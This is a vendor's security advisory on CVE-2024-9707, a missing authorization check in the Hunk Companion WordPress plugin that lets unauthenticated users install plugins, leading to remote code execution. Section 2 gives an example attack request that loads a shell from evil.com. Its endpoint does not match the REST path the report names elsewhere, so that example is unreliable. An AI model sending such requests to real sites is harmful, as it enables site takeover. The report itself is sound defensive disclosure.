[2025.03 Vulnerability Report] HUNK COMPANION Plugin Remote Code Execution (CVE-2024-9707)
This major vulnerability in the Hunk Companion plugin could be the first step in a broader exploit chain. If another plugin with a known vulnerability is activated via this vulnerability, an attacker could achieve remote code execution on the WordPress site.
The widespread distribution of WordPress, the popularity of ThemeHunk themes, and the critical nature of the flaw make this a serious security risk.
In conclusion, this vulnerability highlights the importance of performing proper security reviews and implementing strong authentication and authorization checks within software components. The wide impact and ease of exploitation make this a serious threat that requires immediate attention and remediation.
Our AIWAF product has developed patterns to address vulnerabilities in various plugins and will continue to respond quickly to related vulnerabilities as they are discovered.
1. Overview
The Hunk Companion plugin for WordPress is a plugin that contains the features you need to create a website, and we've analyzed it for CVE-2024-9707, an RCE vulnerability found in the plugin.
Source : https://www.bleepingcomputer.com/news/security/hunk-companion-wordpress-plugin-exploited-to-install-vulnerable-plugins/
2. Attack Type
CVE-2024-9707 is a vulnerability in the Hunk Companion plugin for WordPress in all versions, including 1.8.4, due to missing functionality checks for the /wp-json/hc/v1/themehunk-import REST API endpoint, which allows unauthorized plugin installation/activation. This could allow an unauthenticated attacker to install and activate arbitrary plugins, which could be leveraged to achieve remote code execution once other vulnerable plugins are installed and activated.
Attack Methods:
- The attacker sends a crafted HTTP request to the /wp-json/hc/v1/themehunk-import endpoint.
- The request is processed without validating user authentication or permissions due to missing functional checks.
- The plugin specified in the request is installed and activated on the target WordPress instance.
Example attack syntax:
POST /wp-admin/admin-ajax.php?action=hunk_companion_import HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: ...
content={"file_url":"http://evil.com/shell.php"}
3. Response
CVE-2024-9707 was addressed in a patch for the Hunk Companion Plugin in 1.8.5 or later.
The vulnerability appears to be attacked via a crafted HTTP request to the /wp-json/hc/v1/themehunk-import endpoint.
We will be analyzing this further in our AIWAF product and responding to it as a pattern.
4. Conclusion
This critical vulnerability in the Hunk Companion plugin could be the first step in a broader exploitation chain. If other plugins with known vulnerabilities are enabled through this flaw, an attacker could achieve remote code execution on a WordPress site.
The widespread distribution of WordPress, the popularity of ThemeHunk themes, and the critical nature of the flaw combine to make this a serious security risk.
In conclusion, this vulnerability highlights the importance of conducting proper security reviews and implementing strong authentication and authorization checks within software components. The broad impact and ease of exploitation make this a serious threat that requires immediate attention and remediation.
Our AIWAF product is responding to vulnerabilities in various plugins by developing patterns and will continue to respond to related vulnerabilities as they are discovered.
